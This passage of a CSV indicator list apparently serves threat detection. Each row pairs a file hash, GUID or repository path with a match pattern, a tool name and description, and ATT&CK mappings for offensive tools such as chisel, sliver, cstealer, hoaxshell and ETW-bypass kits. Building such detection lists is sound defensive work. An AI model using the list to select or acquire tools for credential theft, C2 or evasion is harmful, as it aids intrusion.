TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3e3fcf025697ee80f044716eee053848*",".{0,1000}3e3fcf025697ee80f044716eee053848.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d*",".{0,1000}3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2*",".{0,1000}3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1*",".{0,1000}3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3EAB01B5-9B49-48D8-BFA1-5493B26CCB71*",".{0,1000}3EAB01B5\-9B49\-48D8\-BFA1\-5493B26CCB71.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350*",".{0,1000}3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8*",".{0,1000}3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31*",".{0,1000}3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*",".{0,1000}3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099*",".{0,1000}3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966*",".{0,1000}3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*3F0C3D9A-CFB8-4DB5-8419-1C28CBC8621D*",".{0,1000}3F0C3D9A\-CFB8\-4DB5\-8419\-1C28CBC8621D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e*",".{0,1000}3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*3F5558BD-7B94-4CB0-A46C-A7252B5BCA17*",".{0,1000}3F5558BD\-7B94\-4CB0\-A46C\-A7252B5BCA17.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed*",".{0,1000}3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f*",".{0,1000}3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a*",".{0,1000}3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb*",".{0,1000}3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194*",".{0,1000}3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689*",".{0,1000}3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e*",".{0,1000}3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3FBBC3DD-39D9-4D8C-AF73-EDC3D2849DEB*",".{0,1000}3FBBC3DD\-39D9\-4D8C\-AF73\-EDC3D2849DEB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*",".{0,1000}3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*",".{0,1000}3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf*",".{0,1000}3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3gstudent/COM-Object-hijacking*",".{0,1000}3gstudent\/COM\-Object\-hijacking.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*3gstudent/Office-Persistence*",".{0,1000}3gstudent\/Office\-Persistence.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*3gstudent/Waitfor-Persistence*",".{0,1000}3gstudent\/Waitfor\-Persistence.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*3kom-superhack.txt*",".{0,1000}3kom\-superhack\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*3snake-master*",".{0,1000}3snake\-master.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*3xpl01tc0d3r/ProcessInjection*",".{0,1000}3xpl01tc0d3r\/ProcessInjection.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*4.5.6.7:1337*",".{0,1000}4\.5\.6\.7\:1337.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*40056/service-endpoint*",".{0,1000}40056\/service\-endpoint.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5*",".{0,1000}40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*4045eef04cb934ac996942d0d51e80420b2ba985*",".{0,1000}4045eef04cb934ac996942d0d51e80420b2ba985.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea*",".{0,1000}405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc*",".{0,1000}4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583*",".{0,1000}40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b*",".{0,1000}409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4*",".{0,1000}409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58*",".{0,1000}40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*",".{0,1000}40B05F26\-6A2F\-40BC\-88DE\-F40D4BC77FB0.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*40C6A1BB-69AA-4869-81EE-41917D0B009A*",".{0,1000}40C6A1BB\-69AA\-4869\-81EE\-41917D0B009A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*",".{0,1000}40E7714F\-460D\-4CA6\-9A5A\-FB32C6769BE4.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc*",".{0,1000}40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec*",".{0,1000}40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463*",".{0,1000}40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50*",".{0,1000}410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a*",".{0,1000}41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*41414141-4141-4141-4141-414141414141*",".{0,1000}41414141\-4141\-4141\-4141\-414141414141.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","default SMB challenge https://pbs.twimg.com/media/GHcBPL8a4AA18Jl?format=jpg","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250*",".{0,1000}4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive 